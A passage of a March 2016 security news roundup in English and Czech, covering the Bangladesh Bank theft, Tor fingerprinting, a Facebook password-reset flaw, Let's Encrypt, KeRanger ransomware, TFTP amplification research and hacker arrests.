The Bangladesh’s central bank has about $28 billion in foreign currency reserves, according to the country’s Prothom Alo newspaper, at least 30 transfer requests were made on February 5 using the Bangladesh Bank’s SWIFT code. Five transfers were successfully completed.

How is possible?

Difficult to say because there aren’t details on the event. It is likely hackers breached Bangladesh Bank in early February stealing credentials for payment transfers, then they used the credentials to order transfers out of a Federal Reserve Bank of New York account held by Bangladesh Bank.

Anyway it is a complex hack, attackers had a deep knowledge about Bangladesh Bank’s procedures for ordering transfers, likely they spied on Bangladesh Bank staff to gather the information.

Other incidents involved the US Feds in the past, in 2014 a British citizen was accused of hacking its servers and leaking sensitive data.


Tracking users on the Tor Network through mouse movements
10.3.2016 Safety

A security researcher has devised a new technique to track users by analyzing the mouse movements, even when surfing on the Tor network.
While we surf on the Internet we leave an impressive amount of traces that could be used to track our profile and also reveal our identity even we are visiting resources in the darknet.

The way a user moves writes a blog post or moves a mouse could allow to track him.

The security researcher Jose Carlos Norte (@jcarlosnorte) has elaborated a technique relying on Javascript to create a unique fingerprint of internet users that could be used to track users while accessing the Tor network.

“While preventing users IP address to be disclosed is a key aspect for protecting their privacy, a lot of other things need to be taken into consideration. Tor browser is preconfigured to prevent a lot of possible attacks on user privacy, not only the communications layer provided by tor itself.” wrote Jose Carlos Norte.

“One common problem that tor browser tries to address is user fingerprinting. If a website is able to generate a unique fingerprint that identifies each user that enters the page, then it is possible to track the activity of this user in time, for example, correlate visits of the user during an entire year, knowing that its the same user. Or even worse, it could be possible to identify the user if the fingerprint is the same in tor browser and in the normal browser used to browse internet. It is very important for the tor browser to prevent any attempt on fingerprinting the user.”

surveillance NSA mobile

The researcher explained that his Javascript code, once deployed on a website, could fingerprint a user based on how he moves the mouse. The researcher explained that observing user’s movements in a ‘significant’ number of pages the user visits on the clear web it is possible to create a unique fingerprint that can allow his identification even when he is in the Tor network.

The expert created a quick and dirty PoC called UberCookie to demonstrate that is possible to fingerprint a user in a controlled environment.

Norte explained that the most interesting fingerprinting vector he discovered on Tor Browser is getClientRects that allows to get the exact pixel position and size of the box of a given DOM element.

The results of the getClientRects call depend on multiple factors, including the resolution and the font configuration that can compose the fingerprinting vector.

Lorenzo Bicchierai from MotherBoard tried to contact members of the Tor Project and is still waiting for a reply.

“The Tor Project did not respond to a request for comment, but it seems that its developers are looking into this issue, according to two official bug reports. ” wrote Bicchierai.

The popular cyber security expert Mikko Hypponen published a Tweet that define “clever” the technique.

To avoid beign tracked with this fingerprint technique users can deactivate Javascript completely.


Čínští ISP vsouvají do stránek malware a inzerci

9.3.2016 Viry

Nejde přitom o nějaké malé poskytovatele připojení, přistiženy byly China Telecom a China Unicom, dva z největších ISP v zemi.
Podle trojice izraelských výzkumníků (viz PDF na Website-Targeted False Content Injection by Network Operators) se čínští poskytovatelé připojení k internetu věnují vsouvání obsahu do stránek, které navštíví jejich uživatelé. V systému proxy serverů do webů přidávají jak reklamy, tak odkazy na malware. Týká se to i situace, kdy návštěvník vstupuje na weby, které jsou hostované v systémech těchto ISP.

Alarmující na těchto aktivitách je, že se jí věnují i dva z největších ISP v zemi, China Telecom a China Unicom. Ty zároveň v zásadě vlastní veškerý provoz, který pochází od menších ISP a probíhá mezi nimi a zbytkem země či světa.

Celé to funguje tak, že je využíván systém detekce specifických URL, které jsou poté přesměrovány a zpracovávány. Ještě zajímavější je, že dochází ke zkoumání procházejících paketů a jejich modifikaci, ale bez zahození originálu. Spolu s originálem je pak posílán i změněný paket.

V praxi to poté znamená, že příjemce může ve finále získat jeden z těchto dvou paketů, originál nebo změněný. Využívá se i 302-Redirect místo původní 200-OK odpovědi, dojde tím k přesměrování na jiné webové stránky.

Zásah do komunikace probíhá ale pouze tam, kde je používána nezabezpečená komunikace, vyhnout se problémům lze tedy důsledným používáním https.


Outlook už e-maily nemaže. Microsoft opravil nepříjemnou chybu

9.3.2016 Zranitelnosti
Uživatelé poštovního klienta Outlook se v minulých dnech mohli setkat s nepříjemnou chybou, kvůli které se mazaly e-maily ze serveru. Díky nové opravě to však už nehrozí. Microsoft vydal aktualizaci v úterý.
Novinky.cz o chybě informovaly minulý týden po upozornění jednoho z čtenářů. [celá zpráva]

Vývojáři z Microsoftu o chybě věděli jen o několik dnů déle. To jinými slovy znamená, že na vytvoření záplaty jim stačily necelé dva týdny. Běžně se v takto krátkém čase řeší trhliny týkající se bezpečnosti uživatelů, o což v tomto konkrétním případě vůbec nešlo.

Microsoft Outlook 2016

Chyba se týkala pouze protokolu POP3
Chyba se týkala pouze uživatelů Outlooku 2016, kteří používali poštovní protokol POP3. Ten funguje tak, že uživateli se do počítače nebo chytrého telefonu stáhnou všechny e-maily a bez ohledu na to, zda je časem smaže či nikoliv, zůstanou uchovány na serveru.

Problém byl ale v tom, že v nejnovější verzi poštovního klienta od společnosti Microsoft byly e-maily mazány ze serveru okamžitě. A to i v případě, že v něm bylo nastaveno, že tak má učinit až po nějaké době.

Stahovat aktualizaci je možné prostřednictvím služby Windows Update.


Triviální chyba umožňovala krádeže účtů na Facebooku opakovaným hádáním hesla

9.3.2016 Zranitelnosti
Triviální chyba umožňovala krádeže účtů na Facebooku opakovaným hádáním hesla
Indický bezpečnostní inženýr Anand Prakash objevil závažnou zranitelnost v zabezpečení největší sociální sítě. Umožňovala změnu hesla oběti jen za pomoci hrubé síly.

Zranitelnost se nacházela v mechanismu obnovy zapomenutého hesla. Uživatel má v takovém případě možnost zaslání kódu pro obnovení hesla přes e-mail nebo telefon. Šestimístné číslo následně zadá přímo na Facebooku, přičemž nastaví heslo nové.

Síť podle Prakash blokuje zadávání kódu po 10 až 12 neúspěšných pokusech. Omezení se však dalo obejít přístupem přes adresy beta.facebook.com či mbasic.beta.facebook.com, kde nebylo implementováno. Útočník tak mohl hádáním číselných kombinací získat přístup k cílenému účtu. Znamená to sice milion možností, ale pro automatický skript by to byla jednoduchá, výkonově nenáročná úloha.

Po nastavení nového hesla se hacker přihlásí do účtu za pomoci e-mailu nebo telefonního čísla dané osoby. Může jít o známé údaje zejména v případech, kdy svou oběť zná.
Facebook se o chybě dozvěděl 22. února a chybu ihned s přispěním Prakashe opravil. Ind na oplátku dostal odměnu ve výši 15 tisíc amerických dolarů (370 tisíc korun).


More than 1 Million Websites Install Free SSL Certificate (and Counting...)
9.3.2016 Security
Let's Encrypt has achieved another big milestone by issuing 1 million free Transport Layer Security (TLS) SSL Certificates to webmasters who wish to secure the communications between their users and domains.
Let's Encrypt – operated by the Internet Security Research Group (ISRG) – is an absolutely free, and open source certificate authority recognized by all major browsers, including Google's Chrome, Mozilla's Firefox and Microsoft's Internet Explorer.
It is just three months and five days since Let's Encrypt launched a beta version of the service, and the group has crossed 1 Million certificates in use across the Web, Let's Encrypt said in a blog post on Tuesday.
Let's Encrypt allows anyone to obtain Free SSL/TLS (Secure Socket Layer/Transport Layer Security) certificates for their web servers.
Backed by companies including EFF, Akamai and Mozilla, the Let's Encrypt project started offering Free HTTPS certs to everyone from last December.
Let's Encrypt certificates are configured with cross-signatures from SSL cert provider IdenTrust, making its free certs trustworthy and allowing users to browse more securely on the Internet.
With Let's Encrypt, it is very easy for anyone to set up an HTTPS website in a few simple steps (Here's How to Install Free SSL Cert).
Here's what Let's Encrypt says in its post:
"Much more work remains to be done before the Internet is free from insecure protocols, but this is substantial and rapid progress. It is clear that the cost and bureaucracy of obtaining certificates was forcing many websites to continue with the insecure HTTP protocol, long after we've known that HTTPS needs to be the default.
We're very proud to be seeing that change, and helping to create a future in which newly provisioned websites are automatically secure and encrypted."
Let's Encrypt had signed its First free HTTPS certificate in September, and its client software emerged in early November.
Also Read: Hackers Install Free SSL Certs from Let's Encrypt On Malicious Web Sites.
So, now it's time for the Internet to take a significant step forward towards security and privacy. With Let's Encrypt, the team wants HTTPS becomes the default and to make that possible for everyone, it had built Let's Encrypt in such a way that it is easy to obtain and manage.


Brazilian underground is the first in spreading cross-platform malware
9.3.2016 Virus

Coder in the Brazilian Cyber Criminal underground are Pioneering Cross-platform malware relying on Java archive (JAR) Files.
Recently security experts at PaloAlto Networks uncovered a new family of ransomware dubbed KeRanger that targets Mac OS X users, a circumstance that demonstrates that every OS is potentially at risk.

Now researchers at Kaspersky Lab have discovered new families of malware that are being distributed as JAR Java executables to allow the malicious code to run on Mac, Linux, and Windows, and even on Android devices under special conditions.

The malware authors are packing the malicious code as a JAR file to develop cross-platform malware. Of course in order to run the code, it is necessary that the Java Runtime Environment (JRE) is installed on the target machine.

Fortunately for the crooks, Java is installed on 70-80% of machines worldwide, and Brazilian vxers seems to be aware of this.

“Brazilian Trojan Banker coders are now making Trojans running on all platforms and not only Windows.” wrote cyber threat experts from Kaspersky Dmitry Bestuzhev.

“Because Jar files run on Windows, OS X and Linux, wherever Java is installed. This is the very first step cybercriminals from Brazil have made towards “cross-platforming“.”

Kaspersky experts noticed that the Brazilian criminal underground is a pioneer in the development of cross-platform malware. The malware researchers also noticed that the new threats result from the development of distinct gangs in Brazil.

Kaspersky discovered several spam campaigns delivering malicious JAR files, or JAR files placed inside archives sent as attachments. These campaigns aimed to spread malicious codes, mainly banking trojan, named as Trojan-Banker.Java.Agent, Trojan-Downloader.Java.Banload, and Trojan-Downloader.Java.Agent.

Most infections have been observed in Brazil, followed by China and Germany.

cross-platform malware Brazil infections

Another aspect that makes these campaigns very insidious is that the cross-platform malware is stealthy and presents a low detection rate. These droppers are tiny pieces of code, with limited malicious features, for this reason they can easily evade detection and download on the infected machine other malware.

“Actually, the general detection rate for ALL AV vendors is extremely low.” continues the post. Cross-OS malware droppers are only the first step

The experts at Kaspersky highlighted that Brazilian coders have developed a cross-OS dropper at the moment used to spread older banking malware, but researchers believe cross-platform JAR-packed banking trojan is under development.

As Dmitry Bestuzhev, cyber threats researcher for Kaspersky, explains, this may only be a matter of time.

“Are Brazilian coders going to release full bankers – bandleaders and bankers running exclusively on Jar?” “There is no reason to believe they won’t. They have just started and they won’t stop.” states the post.


Let’s Encrypt has already issued one Million certificates
9.3.2016 Security

The Electronic Frontier Foundation announced that the Let’s Encrypt Certificate Authority issued its millionth certificate.
The open Certificate Authority (CA) Let’s Encrypt seems to be a success, the EFF is reaching its goals with the creation of this new certificate authority run by Internet Security Research Group (ISRG).

IT giants like Mozilla, Cisco, Akamai, Automattic and IdenTrust joined the initiative with the support of the Linux Foundation. The principal goal is to create a more secure web by encrypting website traffic using Transport Layer Security (TLS) and improve users’ privacy online.

The Let’s Encrypt CA issued its first certificate in September 2015, and today the EFF is proud to announce that Let’s Encrypt has issued its first million certificates.

“At 9:04am GMT today, the Let’s Encrypt Certificate Authority issued its millionth certificate. This is an amazing success, coming only 3 months and 5 days since a beta version of the service became publicly available. We’re very excited to be building a more secure and fully encrypted future for the World Wide Web.” states the Electronic Frontier Foundation.

Let's Encrypt has issued its first million certificates
The result is rousing if we consider that 90 percent of the 2.5 million domain names that take advantage of digital certificates issued by Let’s Encrypt had never been reachable by browser-valid HTTPS before.

The principal problems in implementing a HTTPs for each domain are the costs and the effort necessary to install the certificate. The Let’s Encrypt initiative aims to overwhelm these issues by issuing free digital certificates and by automating each phase of the lifecycle of a digital certificate.

The Let’s Encrypt has been a driving force for other similar initiatives, Amazon also started offering free certificates too.

There are other aspects to consider when dealing with Let’s Encrypt certificates, certificates are valid for only 90 days, this means that some website operators might forget to renew their certificates in due time.
“Unlike other CAs that issue certificates that don’t expire for years, LE is issuing short-lived certificates (90 days). All certificates are being published to the Certificate Transparency (CT) project, and you can see them at the crt.sh site.” explained David Holmes from F5 Networks.

Anyway let me say that I’m very happy for the results obtained by the Let’s Encrypt initiative, this is the evidence that we are converging to greater awareness of the risks and the need to take the necessary measures to protect our security and privacy.


How to exploit TFTP protocol to launch powerful DDoS amplification attacks
9.3.2016 Computer Attack

A group of security researchers from the Edinburgh Napier University elaborated a new DDoS amplification technique relying on the TFTP protocol.
A group of security experts from the Edinburgh Napier University (Boris Sieklik, Richard Macfarlane and Prof. William Buchanan) have discovered a new vector for DDoS amplification attacks. Recently the security community has discovered several ways to launch powerful amplification attacks by exploiting misconfigured services such as DNS or Network Time Protocol (NTP), now experts have found a way to exploit also the TFTP protocol (Trivial File Transfer Protocol).

The experts discovered that attackers could exploit TFTP to obtain a significant amplification factor for their attack, and unfortunately the port scanning research conducted for the “Internet Census 2012 ” indicates the presence on the Internet of roughly 599,600 publicly open TFTP servers.

TFTP protocol to launch DDoS amplification attacks

The researchers contacted by El Reg confirmed that the techniques could allow obtaining an amplification factor equal to 60.

“The discovered vulnerability could allow hackers to use these publicly open servers to amplify their traffic, similarly to other DDoS amplification attacks like DNS amplification. If all specific conditions are met this traffic can be applied up to 60 times the original amount,” the researcher Boris Sieklik told El Reg.
“I also studied effects of this attack on different TFTP software implementations and found that most implementations automatically retransmit the same message up to six times, which also contributes to the amplification.”

The TFTP protocol (Trivial File Transfer Protocol) is a simplified version of FTP (File Transfer Protocol) mainly used in local area networks. TFTP is very simple to implement for this reason it is quite common to find TFTP server within organizations.

It is possible to transfer any file by using the TFTP protocol, to obtain the DDoS amplification effect an attacker can a specifically crafted request to the server with a forged return address that represents the address of the target. The response sent by the server is much bigger in size than the original request, obtaining in this way the amplification factor.

The numerous misconfigured services present on the Internet could allow to target a specific website with junk traffic composed of responses to forged web requests.

The researchers announced that they will publish the results of their discovery in the March edition of publisher Elsevier’s Computers & Security journal, it will also include indications to mitigate potential TFTP DDoS amplification attacks.


More than a billion Android devices are easy to hack
9.3.2016 Android

A large percentage of Android devices is affected by security vulnerabilities that could be exploited by attackers to easily gain a Root Access.
According to experts at TrendMicro a large percentage of Android devices in use today is affected by security vulnerabilities that could be exploited by attackers to easily gain a root access.

The attack allows an ill-intentioned to escalate the privileges of any code that is executed on a target device, however, this attack scenario sees an attacker having installed his malicious code onto the device in the first place. Android users need to be very careful of installing any mobile apps from untrusted sources.

Below the description provided by TrendMicro for the CVE-2016-0819 and CVE-2016-0805 flaws discovered by its experts:

CVE-2016-0819

We discovered this particular vulnerability, which is described as a logic bug when an object within the kernel is freed. A node is deleted twice before it is freed. This causes an information leakage and a Use After Free issue in Android. (UAF issues are well-known for being at the heart of exploits, particularly in Internet Explorer.)

CVE-2016-0805

This particular vulnerability lies in the function get_krait_evtinfo. (Krait refers to the processor core used by several Snapdragon processors). The function returns an index for an array; however, the validation of the inputs of this function are not sufficient. As a result, when the array krait_functionsis accessed by the functions krait_clearpmu and krait_evt_setup, an out-of-bounds access results. This can be useful as part of a multiple exploit attack.

Qualcomm Snapdragon systems on a chip Android devices

The problem affects the Qualcomm Snapdragon systems on a chip, more than a billion devices is at risk. The root access to a mobile device allows an attacker to conduct a number of malicious activities, from surveillance to financial frauds.

The vulnerability could be exploited by simply running a malicious app on snapdragon-powered Android devices. Experts at TrendMicro privately reported the security holes to Google that fixed them.

As usually happen in these cases, the high fragmentation of the Android market complicates the patch management process. Many users are still vulnerable to the attack waiting for a security patch.

“As the number of embedded SoCs in devices explode with the IoT growth, we anticipate that these kinds of vulnerabilities will become a bigger problem that will challenge the overall security posture of Internet of Things.” continues the post published by TrendMicro.

Going into technical details, the flaws could be exploited in every mobile and IoT devices that could allow the invocation of the system call perf_event_open. Fortunately, many vendors can have customized the kernel and SELinux policies in order to avoid the call.

According to the Nexus Security Bulletin – February 2016, the CVE-2016-0805 vulnerability affects versions earlier than 4.4.4 to 6.0.1, this means that Nexus 5, Nexus 6, Nexus 6P, Samsung Galaxy Note Edge are vulnerable to the attack.

“We believe that any Snapdragon-powered Android device with a 3.10-version kernel is potentially at risk of this attack. As mentioned earlier, given that many of these devices are either no longer being patched or never received any patches in the first place, they would essentially be left in an insecure state without any patch forthcoming.” conclude TrendMicro.


Bezpečnost u mobilních zařízení

9.3.2016 Mobilní
Mobilní zařízení (tablety a chytré telefony) patří k velice diskutovaným zařízením v dnešním IT prostředí, a to zejména s ohledem na masivní nárůst jejich využití, a na druhé straně k potřebám pro zajištění bezpečnosti při používání těchto zařízení v pracovním prostředí firem.

Uživatelé mobilních zařízení se samozřejmě snaží o maximální využití těchto zařízení i pro pracovní účely, firma ovšem potřebuje také zajistit, aby nedocházelo k ohrožení přístupu k ICT systémům a případnému úniku citlivých dat z firmy. Snahou firem je zavádění různých prostředků, které by měly výše uvedené hrozby eliminovat, tyto prostředky však bohužel poměrně jasně inklinují k tomu, aby se tato zařízení pro jejich uživatele víceméně „uzamkla“.

Nejde samozřejmě o uzamčení zařízení jako takového, ale spíše o limitování využití některých funkcí nebo aplikací, a tím se celkově omezuje uživatelské využití, a to i pro případ využití zařízení pro čistě soukromé účely. Bezpečnost by měla být chápána spíše jako podpůrný prvek pro využití těchto zařízení, a ne fungovat jako sada omezení, které uživateli bude nařizovat, jak může dané zařízení využívat.

Nárůst popularity mobilních zařízení samozřejmě přinesl nové příležitosti a inovační trendy, zatímco současně s tím se objevila také určitá rizika. Hlavním problémem je, že uživatel se s mobilním zařízením pohybuje kdekoli a značnou dobu je mimo dohled a prostory firmy, pro kterou pracuje. Zařízení přitom disponuje možností přihlášení do firemních systémů a možností čtení nebo stahování firemních dat přímo do zařízení. Přitom zařízení může být ukradeno či jinak zneužito, a systémy a data firmy se tak ocitají ve vážném ohrožení.

Další trend, který je v současnosti potřeba vzít do úvahy, je tzv. BYOD (Bring Your Own Device) – tedy situace, kdy si zaměstnanci firem přinášejí do zaměstnání svá vlastní mobilní zařízení (a to podle vlastního výběru a preferencí) a je jim v určité míře umožněno přistupovat k firemním systémům a aplikacím. Když si představíme, jaké operační systémy pro mobilní zařízení jsou na trhu k dispozici (Android, iOS, Windows, BlackBerry), pak je zřejmé, že úloha zajištění jejich bezpečnosti pro IT oddělení je skutečně nelehká. Přestože výrobci OS v poslední době udělali značný pokrok z hlediska možnosti centrální správy a dohledu nad mobilními zařízeními, ale některé tyto systémy se liší svými verzemi na trhu, a tím je centrální správa značně složitější.

Možná ohrožení

V důsledku snadné zranitelnosti se tak stávají mobilní zařízení centrem pozornosti hackerských aktivit více než kterákoli jiná zařízení. Podle zveřejněných statistik společnosti Gartner se očekává, že v roce 2017 bude připadat na tři útoky na mobilní zařízení jeden útok na běžný desktopový počítač.

Mezi známé typy útoků se řadí zejména phishing nebo pharming, jejichž cílem je získání a následné zneužití osobních dat nebo jiných citlivých údajů, které se následně použijí k neautorizovanému přístupu do různých systémů (typicky se může jednat o bankovní účty apod.).

Další potenciální hrozbou se mohou stát i veřejné hotspoty Wi-Fi sítí, kde se v důsledku bezpečnostních nedostatků může naskytnout útočníkům prostor pro sledování komunikace na daném mobilním zařízení, odchytávání hesel, získávání e-mailů apod.

Dalším zdrojem potenciálních problémů jsou cloudové služby, kdy uživatelé mohou z mobilního zařízení ukládat citlivá data například na privátní cloud nebo jiné nedůvěryhodné úložiště.

Velkou hrozbou jsou ale samotní uživatelé mobilních zařízení. Byť IT oddělení definuje určitá pravidla pro používání těchto zařízení a provede správnou konfiguraci přístroje, uživatelé se mnohdy snaží tyto politiky obcházet. A občas je to poměrně jednoduché, protože obchody s aplikacemi nabízejí různé drobné aplikace, které dokážou bezpečnostní funkce jednoduše odblokovat. Dalším úskalím je pak nemožnost kontroly uživatelů, kdy a jak ze svého mobilního zařízení klikají na problematické a nedůvěryhodné odkazy a zařízení si nakazí škodlivým SW (viry, malware apod.).

Přístupy při ochraně zařízení

Pojďme si nyní popsat některé možné bezpečnostní scénáře:

Blokování používání mobilního zařízení:jedním z přístupů bezpečnostní firemní politiky může být snaha o omezení použití mobilního zařízení pouze na dobu, kdy je zaměstnanec na pracovišti, po zbylou dobu by mělo být zařízení blokováno pro použití. Pro uživatele toto opatření příliš uspokojivé určitě není a spíše povede k situaci, že uživatel bude chtít pravidla obcházet anebo zařízení nebude využívat vůbec.

Snaha aplikovat tradiční bezpečnostní přístupy:Jedním z dalších přístupů zajištění bezpečnosti mobilních zařízení je snaha uplatnění stejných bezpečnostních technologií, které jsou používány pro přenosné počítače (filtrování URL adres, IPS, antimalware apod.). Tento přístup však příliš k uspokojivým výsledkům nevede. Jakmile totiž uživatel opustí perimetr firmy, ve které pracuje, nelze již technologii efektivně uplatnit (odlišné připojení k internetu apod.). U jiných technologií, které se instalují na koncová zařízení (antivirové program apod.), zase narážíme na slabý výpočetní výkon nebo výdrž baterie.

Použití softwaru pro správu mobilních zařízení: Jedná se o SW nástroj, který by měl pokrýt komplexní požadavky na správu mobilních zařízení, a to zejména instalaci, údržbu verzí a smazání aplikací, správu zabezpečení a pravidel využívání zařízení a jeho komunikačních/síťových služeb. Samozřejmostí by měla být možnost provedení vzdáleného SW auditu na daném zařízení. Takový SW nástroj by pak měl včas zachytit přítomnost nežádoucí aplikace (nebo i např. jailbreak) nebo nevhodnou konfiguraci zařízení. Na trhu je dnes skutečně široká škála produktů pro správu mobilních zařízení (obecně se tyto SW nástroje označují zkratkou MDM – Mobile Device Management). Většina z nich se obvykle specializuje na celou škálu OS mobilních zařízení. Řešení je postaveno obvykle na principu klient-server, kdy na mobilním zařízení běží agent komunikující se serverovou částí, kam odesílá relevantní informace a zpětně na mobilním telefon přijímá instrukce k provedení konkrétních operací.


Přinášíme detaily k prvnímu vyděračskému malwaru pro Macy

8.3.2016 Viry
Hackeři sice svůj plán nedotáhli do konce, dle všeho však chtěli uživatele Maců přimět k zaplacení desetitisícového výkupného.

Uživatelé Maců se ocitli v ohrožení prvním funkčním ransomwarem cílícím právě na ně. Podle bezpečnostních odborníků se jeho tvůrci snažili najít způsob, jak zašifrovat data, aby uživatele přiměli k zaplacení výkupného.

Zdá se však, že KeRanger, jak byl ransomware nazván, byl objeven o něco dřív, než tvůrci zamýšleli. Odborníci z bezpečnostní společnosti Palo Alto Networks na něj přišli v pátek, jen pár hodin poté, co se dostal do sítě.

Už v pátek odpoledne tak o svém objevu mohli zpravit Apple a společnost tak v neděli mohla anulovat digitální certifikát, který malware využíval k podepisování, a zároveň Transmission, bittorentový klient, který byl zdrojem nákazy, mohl stáhnout infikovanou verzi a vydat bezpečný update.

A i díky tomu, že KeRanger byl opatřen třídenní „inkubační dobou“, kterou potřeboval k tomu, než mohl začít škodit, znepříjemnil život jen hrstce uživatelů. Ti následně čelili rozhodnutí, zda obrečet zašifrovaná data, nebo zaplatit výkupné stanovené na jeden Bitcoin, tedy zhruba 10 tisíc korun.

mbice tvůrců KeRangeru přitom byly daleko vyšší než jen zablokování souborů aktuálně uložených na disku, ransomware měl šifrovat i data zálohovaná prostřednictvím nástroje Time Machine, který je součástí OS X a uživateli je hojně využíván. Přitom právě pravidelné zálohování je jedním z obranných mechanismů, jak se platbě výkupného vyhnout.

„Ransomware je velice výnosná záležitost,“ hodnotí Thomas Reed ze společnosti Malwarebytes. „Pro kyberzločince to je největší zdroj příjmů.“ Podle Reeda se tvůrci škodlivého softwaru na blokování záloh začali soustředit až v poslední době, přičemž zálohování prostřednictvím Time Machine je dle něj nechvalně známé svou křehkostí.

A není tak vyloučeno, že tvůrci KeRangeru měli v úmyslu zálohovaná data nejen zablokovat, ale rovnou zcela zničit. „Pokud Time Machine užíváte s rozumem, je to v pořádku. Jestliže si ale se zálohami pohráváte skrz jinou aplikaci, můžete se dostat do problémů,“ varuje. „Nejlepší variantou je mít záloh několik, ovšem k počítači mít připojenou v daný čas vždy jen jednu.“


Phishing u Seagate, útočníci získali daňové dokumenty W-2 tisíců zaměstnanců

8.3.2016 Phishing
Phishing u Seagate, útočníci získali daňové dokumenty W-2 tisíců zaměstnancůDnes, Milan Šurkala, aktualitaPhishing může někdy pěkně zatopit a občas se jediný útok může týkat tisíců lidí. To se nyní stalo společnosti Seagate, která díky chybě jednoho zaměstnance útočníkům poskytla daňové dokumenty W-2 mnoha tisíců zaměstnanců.
Společnost Seagate řeší zapeklitý problém. Firma se stala obětí phishingu, kdy útočníci poslali e-mail jménem CEO společnosti Stephena Lucza. V něm požadovali daňové dokumenty W-2 zaměstnanců společnosti. Poněvadž žádost vypadala jako pravá, jeden ze zaměstnanců odpověděl a údaje poslal. Bohužel nešlo o legitimní žádost a údaje mnoha tisíců zaměstnanců společnosti Seagate se tak dostaly do nepovolaných rukou.

Úplně stejnou techniku použili útočníci i minulý týden u Snapchatu (opět jménem CEO společnosti požadovali W-2 dokumenty zaměstnanců). Seagate nabídnul dotčeným zaměstnancům dvouleté bezplatné monitorování účtů. Je pravděpodobné, že útočníci chtějí využít tyto údaje k neoprávněnému získání peněz, které se budou vracet z daní.


Hacker Reveals How to Hack Any Facebook Account
8.3.2016 Hacking  Social Site
how-to-hack-facebook-account
Hacking Facebook account is one of the major queries of the Internet user today. It's hard to find the way to hack into someone Facebook account, but a Facebook user just did it.
A security researcher discovered a 'simple vulnerability' in the social network that allowed him to easily hack into any Facebook account, view message conversations, post anything, view payment card details and do whatever the real account holder can.
Facebook bounty hunter Anand Prakash from India recently discovered a Password Reset Vulnerability, a simple yet critical vulnerability that could have given an attacker endless opportunities to brute force a 6-digit code and reset any account's password.
Here's How the Flaw Works
The vulnerability actually resides in the way Facebook's beta domains handle 'Forgot Password' requests.
Facebook lets users change their account password through Password Reset procedure by confirming their Facebook account with a 6-digit code received via email or text message.
To ensure the genuinity of the user, Facebook allows the account holder to try up to a dozen codes before the account confirmation code is blocked due to the brute force protection that limits a large number of attempts.
However, Prakash discovered that the social media giant had not implemented rate-limiting in its password reset process on the beta sites, beta.facebook.com and mbasic.beta.facebook.com, according to a blog post published by Prakash.
Prakash tried to brute force the 6-digit code on the Facebook beta pages in the 'Forgot Password' window and discovered that there is no limit set by Facebook on the number of attempts for beta pages.
Video Demonstration
Prakash has also provided a proof-of-concept (POC) video demonstration that shows the attack in work. You can watch the video given below that will walk you through the entire procedure:

Here's the culprit:
As Prakash explained, the vulnerable POST request in the beta pages is:
lsd=AVoywo13&n=XXXXX
Brute forcing the 'n' successfully allowed Prakash to launch a brute force attack into any Facebook account by setting a new password, taking complete control of any account.
Prakash (@sehacure) discovered the vulnerability in February and reported it to Facebook on February 22. The social network fixed the issue the next day and had paid him $15,000 as a reward considering the severity and impact of the vulnerability.


Hackers and Cyber Experts to Come Together at NullCon 2016
8.3.2016 Safety
A crowd of IT professionals, cyber security experts, thought leaders and business decision makers along with the best minds in the hacking community will come together at annual Nullcon security conference 2016 under the same roof to join their efforts in addressing the most critical issues of the Internet Cyberspace.
NullCon, appropriately dubbed "The Next Security Thing", creates opportunities for both presenting as well as participating in an intimate atmosphere with cyber security events offering the opportunity to learn about new threats, get valuable insights from leading experts, and network with other professionals.
Who goes to the Nullcon Conference, and Why?
Delegates from across the globe will be exposing the latest in information security, new cyber attack vectors, solutions to complex security issues with practical scenarios, thought-provoking ideas and research from the luminaries in the global IT security industry.
Additionally, a number of white hat hackers will be giving talks on the latest cyber threats, and the game-changing cyber security technologies and services they're bringing to fight cyber crime.
The major topics to be presented at Nullcon Conference 2016 will include:
What Google knows about you and your devices, and how to get it
Practical OS X Malware Detection & Analysis
Privacy leaks on 4G-LTE networks
Automatic Automotive Hacking
Making Machines think about security for fun and profit
Million Dollar Baby: Towards ANGRly conquering DARPA CGC
Hitchhiker's Guide to Hacking Industrial Control Systems (ICS)
Abusing Software Defined Networks
NullCon also builds the right niche network for you, both for information as well as business purposes.
Besides security talks, NullCon also provides 2-day workshops and security training.
Even Job seekers including IT professionals, engineers, product marketers, and sales executives are attending Nullcon in hopes of getting face time with the CEOs, CIOs and CISOs who are seeking experienced cyber talent.
NullCon Conference 2016 will be held at Goa (India) on 9-12th March 2016. March 9-10th are assigned for workshops and security training, and 11-12th March will be for security and hacking sessions.


Hacker arrested for ATM Skimming escaped from Prison
8.3.2016 Hacking
Hacker arrested for ATM Skimming escaped Prison
A Romanian card skimmer arrested for being part of an international cybercrime group that used malware to plunder US$217,000 from ATMs has escaped from a Bucharest prison on Sunday morning (6th March).
Renato Marius Tulli, 34, was being held at Police Precinct 19 in Bucharest, the capital of Romania, after being arrested together with 7 other suspects as part of a joint Europol, Eurojust, and DIICOT investigation on January 5, 2016.
Tulli was part of a criminal gang specialized in robbing NCR-based ATMs.
According to the federal authorities, the gang allegedly used a piece of malware, dubbed Tyupkin, to conduct what's known as Jackpotting attack and made Millions by infecting ATMs across Europe and beyond.
Using Tyupkin malware, the criminals were able to empty cash from infected ATMs by issuing commands through the ATM's pin pad.
Authorities announced on Monday that Tulli escaped with Grosy Gostel, 38, a man held for robbery charges, while both of them and other prisoners were out in the precinct's yard taking their daily outdoor break, local media report.
Though Police caught Gostel, ATM malware man Tulli remains on the run.
The ATM hacker and robber managed to cut a hole in the police precinct's fence and then jumped an outer fence at the police station without being noticed by the two officers that were keeping watch.
The 2 Police officers that were on duty that day are now investigated on charges of negligence.
Tulli and his criminal gang raided ATMs between December 2014 and October 2015 in countries including Romania, Hungary, Spain, the Czech Republic, and Russia. Europol estimates the group caused damages to banks of around US$217,000 (€200,000).
Tyupkin malware the gang used has been upgraded in recent months. The malware is now dubbed as GreenDispenser and is being used to target ATMs across Mexico.


'Guccifer,' who Hacked former President, to be extradited to the US
8.3.2016 Hacking
Upon the request of US authorities, Marcel Lazar Lehel, well known as Guccifer, has finally been approved to extradite to the United States to face Computer Intrusion and Identity Theft Charges for 18 months.
Guccifer is an infamous Romanian hacker who was arrested in Romania for hacking into the emails and social networking accounts of numerous high profile the US and Romanian Politicians.
Romania's top court has approved a request by US authorities to extradite Guccifer to the United States, a source within Romania's DIICOT anti-organized crime and terrorism unit told Reuters.
Guccifer's well known political targets included:
Bill Clinton (Former President)
Hillary Clinton (U.S Presidential Candidate)
George W. Bush (Former U.S. President)
Colin Powell (former U.S. Secretary)
George Maior (chief of the Romanian Intelligence Service)
John Tenet (State Director of Central Intelligence for the United States CIA)
Richard Armitage (Republican politician)
Lisa Murkowski (U.S. Senator and former Secret Service Agent) and many more.
